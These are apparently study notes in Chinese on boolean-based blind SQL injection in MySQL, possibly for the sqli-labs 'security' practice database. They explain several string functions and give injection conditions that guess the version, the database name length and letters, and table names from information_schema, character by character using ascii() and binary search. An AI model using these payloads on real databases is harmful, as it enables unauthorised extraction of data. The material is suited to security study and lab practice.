布尔盲注

MySQL函数

length()：计算字符串长度

 

ascii()：把字符转换成ascii码值的函数

 

substr()：截取字符串（用法：substr(string string,num start,num length);string为字符串；start为起始位置；length为长度。注意：mysql中的start是从1开始的）

 

left()：一个字符串函数，它返回具有指定长度的字符串的左边部分（left(Str,length);接收两个参数：str：一个字符串；length：想要截取的长度，是一个正整数；）

数据库版本信息：select substr(version(),1,1)=5

 

数据库名长度:length(database())=猜测长度数字

 

数据库名称：left(database(),1)='s'（数据库名称第一个字母）

 

直接比对名称中的字母较为不方便，所以引入ascii（0~127），爆破也较为容易

 

猜数据表：(select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='security' limit 0,1)=1

注：此处所猜解的数值可以二分法搞定，故而和order by用法相同

(select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='security' limit 0,1)>1